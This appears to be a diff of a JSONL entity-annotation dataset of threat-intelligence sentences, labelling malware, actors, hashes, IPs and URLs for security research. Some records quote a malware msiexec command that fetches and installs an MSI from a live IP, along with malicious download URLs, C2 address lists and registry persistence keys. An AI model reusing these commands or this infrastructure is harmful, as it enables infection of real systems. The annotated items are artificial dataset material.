+{"id":1892,"text":"The Bahamut Link Fake websites","entities":[{"id":5568,"label":"threat-actor","start_offset":4,"end_offset":11}],"relations":[],"Comments":[]} +{"id":6418,"text":"X64 Brute Ratel C4 Samples: 3ED21A4BFCF9838E06AD3058D13D5C28026C17DC996953A22A00F0609B0DF3B9 3AD53495851BAFC48CAF6D2227A434CA2E0BEF9AB3BD40ABFE4EA8F318D37BBE 973F573CAB683636D9A70B8891263F59E2F02201FFB4DD2E9D7ECBB1521DA03E DD8652E2DCFE3F1A72631B3A9585736FBE77FFABEE4098F6B3C48E1469BF27AA E1A9B35CF1378FDA12310F0920C5C53AD461858B3CB575697EA125DFEE829611 EF9B60AA0E4179C16A9AC441E0A21DC3A1C3DC04B100EE487EABF5C5B1F571A6 D71DC7BA8523947E08C6EEC43A726FE75AED248DFD3A7C4F6537224E9ED05F6F 5887C4646E032E015AA186C5970E8F07D3ED1DE8DBFA298BA4522C89E547419B Malicious DLLs: EA2876E9175410B6F6719F80EE44B9553960758C7D0F7BED73C0FE9A78D8E669 Malicious Encrypted Payloads: B5D1D3C1AEC2F2EF06E7D0B7996BC45DF4744934BD66266A6EBB02D70E35236E X.509 Cert SHA1s: 55684a30a47476fce5b42cbd59add4b0fbc776a3 66aab897e33b3e4d940c51eba8d07f5605d5b275 Infrastructure linked to X.509 Certs or Samples: 104.6.92[.]229 137.184.199[.]17 138.68.50[.]218 138.68.58[.]43 139.162.195[.]169 139.180.187[.]179 147.182.247[.]103 149.154.100[.]151 15.206.84[.]52 159.223.49[.]16 159.65.186[.]50 162.216.240[.]61 172.105.102[.]247 172.81.62[.]82 174.129.157[.]251 178.79.143[.]149 178.79.168[.]110 178.79.172[.]35 18.133.26[.]247 18.130.233[.]249 18.217.179[.]8 18.236.92[.]31 185.138.164[.]112 194.29.186[.]67 194.87.70[.]14 213.168.249[.]232 3.110.56[.]219 3.133.7[.]69 31.184.198[.]83 34.195.122[.]225 34.243.172[.]90 35.170.243[.]216 45.144.225[.]3 45.76.155[.]71 45.79.36[.]192 52.48.51[.]67 52.90.228[.]203 54.229.102[.]30 54.90.137[.]213 89.100.107[.]65 92.255.85[.]173 92.255.85[.]44 94.130.130[.]43 ds.windowsupdate.eu[.]org Hunting for APT29 Spear Phishing Using XDR - Palo Alto Networks Blog Cozy Smuggled Into The Box: APT29 Abusing Legitimate Software For Targeted Operations In Europe Trello From the Other Side: Tracking APT29 Phishing Campaigns New sophisticated email-based attack from NOBELIUM Updated July 6, 2022, at 9:30 a.m. PT.","entities":[{"id":19918,"label":"SHA2","start_offset":29,"end_offset":93},{"id":19919,"label":"SHA2","start_offset":94,"end_offset":158},{"id":19920,"label":"SHA2","start_offset":159,"end_offset":223},{"id":19921,"label":"SHA2","start_offset":224,"end_offset":288},{"id":19922,"label":"SHA2","start_offset":289,"end_offset":353},{"id":19923,"label":"SHA2","start_offset":354,"end_offset":418},{"id":19924,"label":"SHA2","start_offset":419,"end_offset":483},{"id":19925,"label":"SHA2","start_offset":484,"end_offset":548},{"id":19926,"label":"SHA2","start_offset":567,"end_offset":631},{"id":19927,"label":"SHA2","start_offset":664,"end_offset":728},{"id":19928,"label":"MD5","start_offset":749,"end_offset":789},{"id":19929,"label":"SHA1","start_offset":790,"end_offset":830},{"id":19930,"label":"IPV4","start_offset":882,"end_offset":896},{"id":19931,"label":"IPV4","start_offset":897,"end_offset":913},{"id":19932,"label":"IPV4","start_offset":914,"end_offset":929},{"id":19933,"label":"IPV4","start_offset":930,"end_offset":944},{"id":19934,"label":"IPV4","start_offset":945,"end_offset":962},{"id":19935,"label":"IPV4","start_offset":963,"end_offset":980},{"id":19936,"label":"IPV4","start_offset":981,"end_offset":998},{"id":19937,"label":"IPV4","start_offset":999,"end_offset":1016},{"id":19938,"label":"IPV4","start_offset":1017,"end_offset":1031},{"id":19939,"label":"IPV4","start_offset":1032,"end_offset":1047},{"id":19940,"label":"IPV4","start_offset":1048,"end_offset":1063},{"id":19941,"label":"IPV4","start_offset":1064,"end_offset":1080},{"id":19942,"label":"IPV4","start_offset":1081,"end_offset":1098},{"id":19943,"label":"IPV4","start_offset":1099,"end_offset":1113},{"id":19944,"label":"IPV4","start_offset":1114,"end_offset":1131},{"id":19945,"label":"IPV4","start_offset":1132,"end_offset":1148},{"id":19946,"label":"IPV4","start_offset":1149,"end_offset":1165},{"id":19947,"label":"IPV4","start_offset":1166,"end_offset":1181},{"id":19948,"label":"IPV4","start_offset":1182,"end_offset":1197},{"id":19949,"label":"IPV4","start_offset":1198,"end_offset":1214},{"id":19950,"label":"IPV4","start_offset":1215,"end_offset":1229},{"id":19951,"label":"IPV4","start_offset":1230,"end_offset":1244},{"id":19952,"label":"IPV4","start_offset":1245,"end_offset":1262},{"id":19953,"label":"IPV4","start_offset":1263,"end_offset":1278},{"id":19954,"label":"IPV4","start_offset":1279,"end_offset":1293},{"id":19955,"label":"IPV4","start_offset":1294,"end_offset":1311},{"id":19956,"label":"IPV4","start_offset":1312,"end_offset":1326},{"id":19957,"label":"IPV4","start_offset":1327,"end_offset":1339},{"id":19958,"label":"IPV4","start_offset":1340,"end_offset":1355},{"id":19959,"label":"IPV4","start_offset":1356,"end_offset":1372},{"id":19960,"label":"IPV4","start_offset":1373,"end_offset":1388},{"id":19961,"label":"IPV4","start_offset":1389,"end_offset":1405},{"id":19962,"label":"IPV4","start_offset":1406,"end_offset":1420},{"id":19963,"label":"IPV4","start_offset":1421,"end_offset":1435},{"id":19964,"label":"IPV4","start_offset":1436,"end_offset":1450},{"id":19965,"label":"IPV4","start_offset":1451,"end_offset":1464},{"id":19966,"label":"IPV4","start_offset":1465,"end_offset":1480},{"id":19967,"label":"IPV4","start_offset":1481,"end_offset":1496},{"id":19968,"label":"IPV4","start_offset":1497,"end_offset":1512},{"id":19969,"label":"IPV4","start_offset":1513,"end_offset":1528},{"id":19970,"label":"IPV4","start_offset":1529,"end_offset":1544},{"id":19971,"label":"IPV4","start_offset":1545,"end_offset":1559},{"id":19972,"label":"IPV4","start_offset":1560,"end_offset":1575},{"id":19974,"label":"location","start_offset":1603,"end_offset":1610},{"id":19975,"label":"threat-actor","start_offset":1615,"end_offset":1620},{"id":19976,"label":"attack-pattern","start_offset":1621,"end_offset":1635},{"id":19977,"label":"identity","start_offset":1648,"end_offset":1666},{"id":19978,"label":"threat-actor","start_offset":1700,"end_offset":1705},{"id":19979,"label":"location","start_offset":1761,"end_offset":1767},{"id":19980,"label":"threat-actor","start_offset":1805,"end_offset":1810},{"id":19981,"label":"attack-pattern","start_offset":1811,"end_offset":1819},{"id":19984,"label":"TIME","start_offset":1907,"end_offset":1919}],"relations":[],"Comments":[]} +{"id":7374,"text":"head -n 1 cat \/proc\/cpuinfo | grep name |","entities":[],"relations":[],"Comments":[]} +{"id":2407,"text":"Affected Software and Versions Background on the Spring Framework Root Cause Analysis for CVE-2022-22965","entities":[{"id":47486,"label":"vulnerability","start_offset":90,"end_offset":104},{"id":47485,"label":"SOFTWARE","start_offset":49,"end_offset":65}],"relations":[{"id":335,"from_id":47485,"to_id":47486,"type":"has"}],"Comments":[]} +{"id":8257,"text":"Once the multiple layers of script obfuscation are removed, the final payload arrives\u2014a version of the njRAT Trojan; this family has been a known threat since 2015.","entities":[{"id":25496,"label":"location","start_offset":47,"end_offset":50},{"id":25497,"label":"malware","start_offset":103,"end_offset":108}],"relations":[],"Comments":[]} +{"id":13902,"text":"It is the last step before the ransomware is dropped, and the attack often speeds up at this point to complete the process before it is stopped.","entities":[],"relations":[],"Comments":[]} +{"id":3208,"text":" Figure 9.","entities":[],"relations":[],"Comments":[]} +{"id":6051,"text":"We did not recover any responses from those URLs.","entities":[],"relations":[],"Comments":[]} +{"id":1679,"text":"We hope this tool will be valuable to incident responders and others who are plagued by NetWire infections.","entities":[{"id":4985,"label":"malware","start_offset":88,"end_offset":95}],"relations":[],"Comments":[]} +{"id":8583,"text":"We warn users when we suspect a government-backed threat like APT35 is targeting them.","entities":[{"id":26532,"label":"threat-actor","start_offset":62,"end_offset":67},{"id":26533,"label":"location","start_offset":81,"end_offset":85}],"relations":[],"Comments":[]} +{"id":14089,"text":"Note the following similarities: The usage of paths C:\\Users and D:\\ are similar The searching patterns are very similar The extension list is very similar ","entities":[{"id":48171,"label":"FILEPATH","start_offset":66,"end_offset":69},{"id":48170,"label":"FILEPATH","start_offset":53,"end_offset":61}],"relations":[],"Comments":[]} +{"id":10493,"text":"Related IOCs","entities":[],"relations":[],"Comments":[]} +{"id":10381,"text":"The user would need to enable macro for it to open fully, which would use AutoHotkey in loading the malicious script file to avoid detection.","entities":[],"relations":[],"Comments":[]} +{"id":2978,"text":"You may consider configuring it to not broadcast the SSID as well: that can make adding devices a little harder, but that means it\u2019s even harder for people to try and join your home network. 3. Set up More Secure Accounts on Your PCs and Macs: PCs and Macs (both desktop and laptop) are still around and as important as ever in the home.","entities":[],"relations":[],"Comments":[]} +{"id":2417,"text":"For example, there is a simple classical application scenario in which the developer creates a trade object to capture request parameters as shown in Figure 1.","entities":[],"relations":[],"Comments":[]} +{"id":8234,"text":"As such, here are some tips on how to stay safe from these online schemes: Carefully scrutinize all emails.","entities":[{"id":25443,"label":"location","start_offset":14,"end_offset":17},{"id":25444,"label":"threat-actor","start_offset":43,"end_offset":47}],"relations":[],"Comments":[]} +{"id":13179,"text":"USBferry attack scenario, version UF1.0 20160226","entities":[{"id":41125,"label":"malware","start_offset":0,"end_offset":8}],"relations":[],"Comments":[]} +{"id":10020,"text":"(rcview40u.dll)","entities":[],"relations":[],"Comments":[]} +{"id":470,"text":" DGA by itself can\u2019t harm you.","entities":[],"relations":[],"Comments":[]} +{"id":9573,"text":"Accept-Encoding: gzip Connection: Keep-Alive","entities":[],"relations":[],"Comments":[]} +{"id":2376,"text":"StealthVector is designed with various configurable features that make it easy for malicious actors to modify and tailor it to their needs, including a feature that disables Event Tracing for Windows (ETW), allowing the malware to run in stealth mode.","entities":[{"id":45481,"label":"malware","start_offset":0,"end_offset":13}],"relations":[],"Comments":[]} +{"id":5476,"text":"Figure 1: Tweety Chat\u2019s interface (top), and code snippets showing the file types it steals (bottom) Romance in cyberespionage","entities":[{"id":51468,"label":"SOFTWARE","start_offset":10,"end_offset":16}],"relations":[],"Comments":[]} +{"id":6557,"text":" hack520[.]co[.]kr shaiya[.]kr zhu[.]kr shenqi[.]kr zhuxian[.]kr Several of these domains are linked to variants of malware that were used by the Winnti threat actor.","entities":[{"id":20316,"label":"location","start_offset":91,"end_offset":94},{"id":20317,"label":"malware","start_offset":147,"end_offset":153}],"relations":[],"Comments":[]} +{"id":3884,"text":"Last June 9, 2021, the Cybersecurity and Infrastructure Security Agency (CISA) released the Rising Ransomware Threat to OT Assets, which addresses the recent rise in ransomware attacks targeting operational assets (OT) and control systems.","entities":[{"id":49744,"label":"TIME","start_offset":5,"end_offset":17},{"id":49745,"label":"identity","start_offset":23,"end_offset":78}],"relations":[],"Comments":[]} +{"id":14419,"text":"Including detection of this as part of an overall XDR platform will improve the prevention, detection, and remediation of sophisticated attacks on an organization.","entities":[{"id":47173,"label":"SOFTWARE","start_offset":50,"end_offset":54}],"relations":[],"Comments":[]} +{"id":3930,"text":"To deploy its tools, it uses the expand command to extract package files dropped in the system.","entities":[],"relations":[],"Comments":[]} +{"id":770,"text":"If we were able to make the size of the current heap block in this structure larger than the threshold of 0x186A0 bytes and trigger CMemoryProtector::ProtectedFree, it is still possible to force a true freeing action and occupy the freed object with other data as we show in the following piece of javascript code in figure 6. Figure 6. Javascript proof of concept to force freeing When creating the anchor element, the debug logs are shown in figure 7.","entities":[{"id":46347,"label":"SOFTWARE","start_offset":340,"end_offset":350}],"relations":[],"Comments":[]} +{"id":5810,"text":"And you just have computers fighting it out.","entities":[{"id":17969,"label":"location","start_offset":0,"end_offset":3},{"id":17970,"label":"identity","start_offset":8,"end_offset":12}],"relations":[],"Comments":[]} +{"id":6052,"text":"Example Exploit Kit:","entities":[],"relations":[],"Comments":[]} +{"id":2231,"text":"Persistence is achieved by setting the following registry key: HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run The name of the registry key in the above instances is derived from the basename of the supplied argument.","entities":[{"id":6650,"label":"REGISTRYKEY","start_offset":64,"end_offset":114},{"id":6651,"label":"REGISTRYKEY","start_offset":116,"end_offset":166}],"relations":[],"Comments":[]} +{"id":771,"text":"The address of the anchor element is 0x0c3b3f98.","entities":[],"relations":[],"Comments":[]} +{"id":11767,"text":"A few were observed displaying a fake error message requiring user click-through to continue execution.","entities":[],"relations":[],"Comments":[]} +{"id":14293,"text":"When users register, their credit cards will be charged.","entities":[],"relations":[],"Comments":[]} +{"id":1168,"text":"While the research may never result in a fully automated decision system, it has been proven that researchers employing a hybrid approach to analysis will be able to provide critical and timely information to support the continual improvement of the classification system as a whole.","entities":[],"relations":[],"Comments":[]} +{"id":1545,"text":"These attacks begin with an email sent to a carefully chosen target in the agency.","entities":[],"relations":[],"Comments":[]} +{"id":4682,"text":"When they are received, the browser navigates to the official Takeout link to request and eventually download the exported data.","entities":[],"relations":[],"Comments":[]} +{"id":4813,"text":"This app is quite different from the Turla apps described above and written by a different developer.","entities":[{"id":50736,"label":"threat-actor","start_offset":37,"end_offset":42}],"relations":[],"Comments":[]} +{"id":7979,"text":"Since late 2019, our team has disrupted financially motivated phishing campaigns targeting YouTubers with Cookie Theft malware.","entities":[{"id":24726,"label":"attack-pattern","start_offset":62,"end_offset":70}],"relations":[],"Comments":[]} +{"id":7326,"text":"idtpl[.]org registration information based on Whois Lookup But from the middle of July 2020, its IP address changed to 185[.]117[.]88[.]91. Figure 22. Domain History of idtpl[.]org as seen on VirusTotal","entities":[{"id":22803,"label":"IPV4","start_offset":123,"end_offset":142}],"relations":[],"Comments":[]} +{"id":2502,"text":"gdGCT.jsp","entities":[{"id":45552,"label":"FILEPATH","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} +{"id":516,"text":"Figure 2 shows a completely different result from Figure 1 and stems from only counting ransomware samples from cases in which more than five hosts were infected with the same malware.","entities":[],"relations":[],"Comments":[]} +{"id":3673,"text":"Initial Access","entities":[],"relations":[],"Comments":[]} +{"id":4519,"text":"We have also built additional tools to prevent successful attacks on devices that run Android once those devices are in users\u2019 hands.","entities":[{"id":50317,"label":"SOFTWARE","start_offset":86,"end_offset":93}],"relations":[],"Comments":[]} +{"id":1616,"text":"If the user would like to unsubscribe they can text \u201cBAJA\u201d to 797977.","entities":[],"relations":[],"Comments":[]} +{"id":9502,"text":"The infection starts with an executable written in C++ that connects through a Winsock API to a domain or IP address in a specific port.","entities":[],"relations":[],"Comments":[]} +{"id":5192,"text":"Network amplification CVE-2021-38445 OpenDDS, ROS 2 7.0 CWE-130: Improper handling of length CVE-2021-38423 Gurum DDS, ROS 2 8.6 CWE-131: Incorrect calculation of buffer size CVE-2021-38435 Connext DDS, ROS 2 8.6 CVE-2021-38439 Gurum DDS, ROS 2 8.6 CWE-122:","entities":[{"id":51240,"label":"vulnerability","start_offset":22,"end_offset":36},{"id":51241,"label":"vulnerability","start_offset":93,"end_offset":107},{"id":51242,"label":"vulnerability","start_offset":175,"end_offset":189},{"id":51243,"label":"vulnerability","start_offset":213,"end_offset":227}],"relations":[],"Comments":[]} +{"id":14353,"text":"It was in April 2017 when the last Windows variant of Maikspy appeared with the following changes: The C&C server was changed to 198[.]12[.]155[.]84, password theft is added, as well as the theft of .doc, .docx, and .rtf files.","entities":[{"id":51794,"label":"TIME","start_offset":10,"end_offset":20},{"id":51795,"label":"malware","start_offset":54,"end_offset":61},{"id":44340,"label":"IPV4","start_offset":129,"end_offset":148}],"relations":[],"Comments":[]} +{"id":5635,"text":" Figure 6.","entities":[],"relations":[],"Comments":[]} +{"id":8295,"text":"Indicators of CompromiseFiles with the following hashes were used in the first series of attacks: cd8329f75b1393ead3e16c6c79ee1ab476e6487370481e5931feb63305f00983 \u2013 detected as VBS_KEYLOG.NYKW f46f0e8eed0361294200d64e87b3fb13f6a3797f99f5b588444534f27612a590 \u2013 archive file;","entities":[{"id":25565,"label":"SHA1","start_offset":99,"end_offset":163},{"id":25566,"label":"MD5","start_offset":194,"end_offset":258}],"relations":[],"Comments":[]} +{"id":4265,"text":"One file stealer (cca74bb322ad7833a21209b1418c9837e30983daec30d199a839f46075ee72f2, Detected as TSPY_DELF.SUW) published by security researchers in 2013 and linked to the domain myflatnet[.]com, was attributed by several parties to the Hangover group.","entities":[{"id":50067,"label":"threat-actor","start_offset":236,"end_offset":250},{"id":50063,"label":"SHA2","start_offset":18,"end_offset":82},{"id":50064,"label":"malware","start_offset":96,"end_offset":109},{"id":50065,"label":"TIME","start_offset":148,"end_offset":152},{"id":50066,"label":"DOMAIN","start_offset":178,"end_offset":193}],"relations":[{"id":911,"from_id":50063,"to_id":50064,"type":"indicates"},{"id":912,"from_id":50064,"to_id":50066,"type":"communicates-with"},{"id":913,"from_id":50064,"to_id":50067,"type":"attributed-to"}],"Comments":[]} +{"id":1135,"text":" This malware is well documented as a powerful polymorphic worm that encrypts itself differently every time it propagates.","entities":[],"relations":[],"Comments":[]} +{"id":8431,"text":"Safe Browsing also notifies webmasters when their websites are compromised by malicious actors and helps them diagnose and resolve the problem so that their visitors stay safer.","entities":[{"id":25979,"label":"threat-actor","start_offset":28,"end_offset":38},{"id":25980,"label":"location","start_offset":59,"end_offset":62},{"id":25981,"label":"location","start_offset":95,"end_offset":98},{"id":25982,"label":"location","start_offset":105,"end_offset":109},{"id":25983,"label":"location","start_offset":119,"end_offset":122}],"relations":[],"Comments":[]} +{"id":11888,"text":"Unique URLs serving \u200b\u200bCVE-2021-33742 Internet Explorer exploit: http:\/\/lioiamcount[.]com\/IsnoMLgankYg6\/EjlYIy7cdFZFeyFqE4IURS1 http:\/\/db-control-uplink[.]com\/eFe1J00hISDe9Zw\/gzHvIOlHpIXB http:\/\/kidone[.]xyz\/VvE0yYArmvhyTl\/GzV","entities":[{"id":36639,"label":"URL","start_offset":64,"end_offset":88},{"id":36640,"label":"URL","start_offset":127,"end_offset":136},{"id":36641,"label":"URL","start_offset":187,"end_offset":206}],"relations":[],"Comments":[]} +{"id":14116,"text":"When you have many samples to analyze, you can refine that expectation over time.","entities":[],"relations":[],"Comments":[]} +{"id":6366,"text":"This data includes the encrypted configuration settings for Brute Ratel C4.","entities":[],"relations":[],"Comments":[]} +{"id":8513,"text":"In collaboration with YouTube, Gmail, Trust & Safety, CyberCrime Investigation Group and Safe Browsing teams, our protections have decreased the volume of related phishing emails on Gmail by 99.6% since May 2021.","entities":[{"id":26286,"label":"location","start_offset":85,"end_offset":88},{"id":26288,"label":"attack-pattern","start_offset":163,"end_offset":171}],"relations":[],"Comments":[]} +{"id":2399,"text":"Two days later on March 31, 2022, Spring released version 5.3.18 and 5.2.20 of Spring Framework to patch another more severe vulnerability tracked in CVE-2022-22965.","entities":[{"id":47472,"label":"TIME","start_offset":18,"end_offset":32},{"id":47473,"label":"SOFTWARE","start_offset":34,"end_offset":40},{"id":47474,"label":"SOFTWARE","start_offset":79,"end_offset":95},{"id":47475,"label":"vulnerability","start_offset":150,"end_offset":164}],"relations":[{"id":333,"from_id":47474,"to_id":47475,"type":"has"}],"Comments":[]} +{"id":8909,"text":"Trend Micro Solutions Trend Micro\u2019s comprehensive XDR solution applies the most effective expert analytics to the deep data sets collected from Trend Micro solutions across the enterprise \u2014 including email, endpoints, servers, cloud workloads, and networks \u2014 making faster connections to identify and stop attacks.","entities":[{"id":27530,"label":"location","start_offset":75,"end_offset":79},{"id":27532,"label":"location","start_offset":177,"end_offset":187},{"id":27533,"label":"location","start_offset":227,"end_offset":232},{"id":27534,"label":"location","start_offset":244,"end_offset":247},{"id":27535,"label":"location","start_offset":297,"end_offset":300},{"id":27536,"label":"malware","start_offset":301,"end_offset":305}],"relations":[],"Comments":[]} +{"id":967,"text":"MySd2e Service registers receiver for Rf2b ","entities":[],"relations":[],"Comments":[]} +{"id":13605,"text":"As described earlier, the XSS attack script redirects the victim to a fake Flash download site.","entities":[{"id":42403,"label":"attack-pattern","start_offset":26,"end_offset":29}],"relations":[],"Comments":[]} +{"id":2864,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} +{"id":14408,"text":"Leverage WMI for fileless intrusion Execute Powershell script for fileless intrusion","entities":[{"id":47166,"label":"attack-pattern","start_offset":66,"end_offset":84},{"id":44534,"label":"tools","start_offset":44,"end_offset":54}],"relations":[{"id":309,"from_id":44534,"to_id":47166,"type":"uses"}],"Comments":[]} +{"id":564,"text":"After infection, Virlock hides the file extension through modification of the registry (HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\HideFileExt = 1, HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden = 2).","entities":[{"id":1874,"label":"REGISTRYKEY","start_offset":88,"end_offset":164},{"id":1876,"label":"REGISTRYKEY","start_offset":170,"end_offset":241},{"id":44778,"label":"malware","start_offset":17,"end_offset":24}],"relations":[{"id":165,"from_id":1874,"to_id":44778,"type":"indicates"},{"id":166,"from_id":1876,"to_id":44778,"type":"indicates"}],"Comments":[]} +{"id":4054,"text":"After the backdoor is launched, it will decrypt the embedded C&C configuration via AES (CTR mode) algorithm for the following connection.","entities":[],"relations":[],"Comments":[]} +{"id":6448,"text":"RemoteUtilities Analysis","entities":[{"id":20076,"label":"tools","start_offset":0,"end_offset":15}],"relations":[],"Comments":[]} +{"id":4561,"text":"It also downloads a list of targets from an external site, but unlike the Turla apps, it continually sends requests to the target websites until it is stopped by the user.","entities":[{"id":50378,"label":"threat-actor","start_offset":74,"end_offset":79}],"relations":[],"Comments":[]} +{"id":5298,"text":" It also creates a pipe for inter-process communication (IPC) by calling the pipe() function for getting two file descriptors for reading and writing data.","entities":[],"relations":[],"Comments":[]} +{"id":2313,"text":"The exploit chain combined an RCE in WebKit exploiting CVE-2021-1789 which was patched on Jan 5, 2021 before discovery of this campaign and a 0-day local privilege escalation in XNU (CVE-2021-30869) patched on Sept 23, 2021.","entities":[{"id":45456,"label":"vulnerability","start_offset":55,"end_offset":68},{"id":45462,"label":"SOFTWARE","start_offset":178,"end_offset":181},{"id":45460,"label":"TIME","start_offset":210,"end_offset":223},{"id":45461,"label":"attack-pattern","start_offset":148,"end_offset":174},{"id":45457,"label":"SOFTWARE","start_offset":37,"end_offset":43},{"id":45458,"label":"TIME","start_offset":90,"end_offset":101},{"id":45459,"label":"vulnerability","start_offset":183,"end_offset":197}],"relations":[{"id":98,"from_id":45456,"to_id":45457,"type":"has"},{"id":99,"from_id":45459,"to_id":45462,"type":"has"}],"Comments":[]} +{"id":4341,"text":". Figure 4. Code showing the main function of the file stealer ","entities":[],"relations":[],"Comments":[]} +{"id":3813,"text":"The commands and output of Koadic will change according to the ANEL version used in the attack.","entities":[{"id":49686,"label":"malware","start_offset":27,"end_offset":33},{"id":49685,"label":"malware","start_offset":63,"end_offset":67}],"relations":[],"Comments":[]} +{"id":3846,"text":"For example, the initial ANEL version, \u201c5.0.0 beta1,\u201d uses a different C&C server compared to the other versions.","entities":[{"id":11660,"label":"malware","start_offset":25,"end_offset":29}],"relations":[],"Comments":[]} +{"id":7332,"text":"Chi Ngoc Canada Backdoor.SH.OCEANLOTUS.F 05e5ba08be06f2d0e2da294de4c559ca33c4c28534919e5f2f6fc51aed4956e3 2nd stage fat binary Backdoor.MacOS.OCEANLOTUS.F fd7e51e3f3240b550f0405a67e98a97d86747a8a07218e8150d2c2946141f737 3rd stage fat binary Backdoor.MacOS.OCEANLOTUS.F Domains mihannevis[.]com mykessef[.]com idtpl[.]org MITRE TTP Tactic ID Name","entities":[{"id":22822,"label":"location","start_offset":0,"end_offset":3},{"id":22823,"label":"location","start_offset":9,"end_offset":15},{"id":22824,"label":"SHA1","start_offset":43,"end_offset":107},{"id":22825,"label":"SHA2","start_offset":160,"end_offset":224}],"relations":[],"Comments":[]} {"id":7768,"text":" Figure 20.","entities":[],"relations":[],"Comments":[]} -{"id":7769,"text":"Original PE header members (left) vs. overwritten header members (right)","entities":[],"relations":[],"Comments":[]} -{"id":7770,"text":"The decrypted FlawedAmmyy RAT slightly different from the one that TA505 reused over its past campaigns.","entities":[{"id":24087,"label":"malware","start_offset":14,"end_offset":25},{"id":24088,"label":"location","start_offset":58,"end_offset":61}],"relations":[],"Comments":[]} -{"id":7771,"text":"While the previous strings had the modified AmmyyAdmin binary since the source code was leaked, TA505 changed the strings in this sample to PopssAdmin.","entities":[{"id":24090,"label":"attack-pattern","start_offset":72,"end_offset":78},{"id":24092,"label":"location","start_offset":130,"end_offset":136}],"relations":[],"Comments":[]} -{"id":7773,"text":" Figure 21.","entities":[],"relations":[],"Comments":[]} -{"id":7774,"text":"Significant changes in the binary","entities":[],"relations":[],"Comments":[]} -{"id":7776,"text":"We also found that the file delivered is an .MSI executable containing the same .DLL FlawedAmmyy downloader.","entities":[{"id":24099,"label":"location","start_offset":75,"end_offset":79},{"id":24100,"label":"malware","start_offset":85,"end_offset":96}],"relations":[],"Comments":[]} -{"id":7780,"text":" Figure 23.","entities":[],"relations":[],"Comments":[]} -{"id":7781,"text":"Final command strings in document’s “tag” properties.","entities":[],"relations":[],"Comments":[]} -{"id":7782,"text":"The final command executes the download and installation of the .MSI file into C:\\Windows\\System32\\msiexec.exe\" back=13 error=continue \/i http:\/\/92[.]38[.]135[.]99\/99.msi \/q OnLoad=\"c:\\windows\\notepad.exe Figure 24.","entities":[{"id":24108,"label":"location","start_offset":40,"end_offset":43},{"id":24109,"label":"URL","start_offset":138,"end_offset":170}],"relations":[],"Comments":[]} -{"id":7783,"text":".MSI file installed in the system","entities":[],"relations":[],"Comments":[]} -{"id":7785,"text":"The other three parameters do not appear to be used at all, as reported in the install log (by adding \/L*V \"C:\\example.log\" parameter).","entities":[],"relations":[],"Comments":[]} -{"id":7786,"text":"The .MSI file is a downloader with the .DLL FlawedAmmyy downloader inside; it retrieves the final payload, then decrypts and executes FlawedAmmyy RAT.","entities":[{"id":24114,"label":"malware","start_offset":44,"end_offset":55},{"id":24115,"label":"location","start_offset":121,"end_offset":124},{"id":24116,"label":"malware","start_offset":134,"end_offset":145}],"relations":[],"Comments":[]} -{"id":7787,"text":"Figure 25.","entities":[],"relations":[],"Comments":[]} -{"id":7788,"text":"Unused parameters from","entities":[],"relations":[],"Comments":[]} -{"id":7789,"text":"log","entities":[],"relations":[],"Comments":[]} -{"id":7792,"text":"This .MSI file delivers the NSIS-packed ServHelper, and the binary shares the same C&C server as the campaign targeting Saudi Arabia, Oman, Qatar, and Turkey.","entities":[{"id":24128,"label":"malware","start_offset":28,"end_offset":32},{"id":24130,"label":"location","start_offset":52,"end_offset":55},{"id":24131,"label":"location","start_offset":78,"end_offset":82},{"id":24132,"label":"location","start_offset":101,"end_offset":109},{"id":24136,"label":"location","start_offset":147,"end_offset":150}],"relations":[],"Comments":[]} -{"id":7793,"text":"Suspicious activity using ServHelper A campaign targeting China spoofed FedEx-themed emails with subjects pertaining to delivery problems, failures, or notifications.","entities":[{"id":24138,"label":"malware","start_offset":26,"end_offset":36},{"id":24139,"label":"location","start_offset":39,"end_offset":47}],"relations":[],"Comments":[]} -{"id":7794,"text":"Instead of attachments, it had malicious URLs in the message content that lead to the download of a malicious document named fedex.doc from hxxp:\/\/www.fedexdocs[.]top\/fedex.doc or hxxp:\/\/www.fedexdocs[.]icu\/fedex.doc.","entities":[{"id":24142,"label":"location","start_offset":61,"end_offset":68},{"id":24143,"label":"threat-actor","start_offset":74,"end_offset":78}],"relations":[],"Comments":[]} -{"id":7795,"text":"The VBA macro in the document downloads an NSIS-packed executable from hxxps:\/\/senddocs[.]icu\/stelar.exe, which installs ServHelper.","entities":[{"id":24144,"label":"malware","start_offset":43,"end_offset":47},{"id":24145,"label":"tools","start_offset":121,"end_offset":131}],"relations":[],"Comments":[]} -{"id":7796,"text":"However, while initial analysis of the macro it used made us believe that this was from TA505, the macros’ obfuscation and style turned out to be more similar to the ones described in this post, based on the code page, senders, and fast flux.","entities":[{"id":24146,"label":"location","start_offset":53,"end_offset":57},{"id":24148,"label":"location","start_offset":119,"end_offset":122},{"id":24149,"label":"location","start_offset":189,"end_offset":193},{"id":24150,"label":"malware","start_offset":213,"end_offset":217},{"id":24151,"label":"location","start_offset":228,"end_offset":231}],"relations":[],"Comments":[]} -{"id":7799,"text":"Conclusion","entities":[],"relations":[],"Comments":[]} -{"id":7810,"text":"As they continue to target businesses in different sectors, we can expect TA505 to keep using phishing and social engineering techniques to compromise systems.","entities":[{"id":24197,"label":"location","start_offset":20,"end_offset":26},{"id":24198,"label":"location","start_offset":63,"end_offset":66},{"id":24200,"label":"attack-pattern","start_offset":94,"end_offset":102},{"id":24201,"label":"location","start_offset":103,"end_offset":106}],"relations":[],"Comments":[]} -{"id":7817,"text":"Trend Micro™ Hosted Email Security is a no-maintenance cloud solution that delivers continuously updated protection to stop spam, malware, spear phishing, ransomware, and advanced targeted attacks before they reach the network.","entities":[{"id":24223,"label":"location","start_offset":6,"end_offset":11},{"id":24224,"label":"location","start_offset":26,"end_offset":34},{"id":24225,"label":"location","start_offset":55,"end_offset":60},{"id":24226,"label":"location","start_offset":105,"end_offset":115},{"id":24227,"label":"location","start_offset":119,"end_offset":123},{"id":24228,"label":"attack-pattern","start_offset":139,"end_offset":153},{"id":24229,"label":"location","start_offset":167,"end_offset":170}],"relations":[],"Comments":[]} -{"id":7823,"text":"Microsoft has since updated the FAQ section of the advisory that shows CVE-2021-34527 is similar but distinct from CVE-2021-1675, which addresses a different but related vulnerability in 